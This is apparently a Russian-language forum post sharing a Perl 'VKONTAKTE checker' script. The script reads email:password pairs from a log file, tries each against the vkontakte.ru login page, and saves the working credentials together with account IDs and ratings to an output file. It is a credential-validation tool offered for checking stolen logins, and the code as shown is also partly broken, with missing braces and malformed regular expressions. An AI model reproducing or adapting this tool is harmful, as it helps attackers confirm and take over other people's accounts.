Скрипт написан на перле => для его работы нужен activePerl !!!
PHP код:
# VKONTAKTE cheker
# Original author Xszz.AoH
# Modified by svesve
# tnx to a4at members who help me with perl;-)
use strict;
use LWP::UserAgent;
use HTTP::Cookies;
open (FILE , '<logs.txt');
my @f = <FILE>;
chomp @f;
my $ua = LWP::UserAgent->new;
my $cookies = HTTP::Cookies->new(agent => 'Opera/9.50 (X11; Linux x86_64; U; ru)');
open (OUT , '>>IDS_rate.txt');
while (@f)
my ($mail, $pass) = split(/:/, shift(@f));
my $req = $ua->post('http://vkontakte.ru/login.php', { email => $mail, pass => $pass } )->as_string;
my $suc = $req =~ /302 Found/;
if ($suc )
$req = $ua->get('http://vkontakte.ru/index.php')->as_string;
my $id = $req =~ /(a href="http:\/\/vkontakte.ru\/id)(\d+)(">[Реклама]/;
my $idd=$2;
$req = $ua->get('http://vkontakte.ru/rate.php')->as_string;
my $res = $1 if $req=~m/width:100px">(.{1,4})</;
print "[rate=$res]:[id=$idd]:$mail:$pass\n";
if (!$idd)
print "Account deleted \n";
print OUT $res.":".$idd.":".$mail.":".$pass."\n";
else{print"[-]bad login or password \n";}
close OUT;
close FILE;